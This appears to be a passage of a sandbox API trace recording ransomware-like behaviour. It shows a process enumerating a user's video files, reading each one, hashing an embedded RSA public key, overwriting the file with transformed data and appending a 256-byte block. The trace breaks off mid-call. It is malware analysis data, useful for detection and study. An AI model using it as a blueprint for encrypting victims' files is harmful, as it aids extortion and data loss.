"c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\y1fygdtm\\e2qjqbao421mhh73fo.flv.npsg")) returned 1 [0239.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.644] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.646] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xded898a0, ftCreationTime.dwHighDateTime=0x1d5bfaa, ftLastAccessTime.dwLowDateTime=0xd347fae0, ftLastAccessTime.dwHighDateTime=0x1d5b897, ftLastWriteTime.dwLowDateTime=0xd347fae0, ftLastWriteTime.dwHighDateTime=0x1d5b897, nFileSizeHigh=0x0, nFileSizeLow=0x12bcf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TC3tPjd9xnk.mkv", cAlternateFileName="TC3TPJ~1.MKV")) returned 1 [0239.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0239.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.646] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\Y1FygDtm\\TC3tPjd9xnk.mkv") returned=".mkv" [0239.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\Y1FygDtm\\TC3tPjd9xnk.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\y1fygdtm\\tc3tpjd9xnk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.646] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=76751) returned 1 [0239.646] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.649] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x12ba9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.649] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.651] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.651] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x12bcf, lpOverlapped=0x0) returned 1 [0239.652] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.653] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.653] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.653] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.654] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.654] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.654] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.654] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.654] GetLastError () returned 0x0 [0239.654] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.654] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.654] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.654] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.654] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12bd0) returned 0x3b95d50 [0239.655] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86b88 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e08 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86bd0 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e20 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e50 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88eb0 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e68 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.656] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e50 | out: hHeap=0x620000) returned 1 [0239.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e68 | out: hHeap=0x620000) returned 1 [0239.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88eb0 | out: hHeap=0x620000) returned 1 [0239.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88eb0 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e68 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88e50 [0239.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0239.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0239.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0239.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e68 | out: hHeap=0x620000) returned 1 [0239.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e50 | out: hHeap=0x620000) returned 1 [0239.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88eb0 | out: hHeap=0x620000) returned 1 [0239.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.657] GetCurrentThreadId () returned 0x5b4 [0239.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b88908 [0239.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.658] GetCurrentThreadId () returned 0x5b4 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0239.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88eb0 [0239.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e50 [0239.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0239.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e68 [0239.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e38 [0239.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88ec8 [0239.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e98 [0239.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e80 [0239.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88ee0 [0239.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e80 | out: hHeap=0x620000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e80 [0239.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e98 | out: hHeap=0x620000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e50 | out: hHeap=0x620000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e50 [0239.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88eb0 | out: hHeap=0x620000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ee0 | out: hHeap=0x620000) returned 1 [0239.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e50 | out: hHeap=0x620000) returned 1 [0239.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e80 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ec8 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e68 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e38 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e20 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86bd0 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.663] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x12bca, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x12bca, lpOverlapped=0x0) returned 1 [0239.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0239.663] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x12bcf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.663] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0239.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0239.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0239.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0239.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0239.664] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, 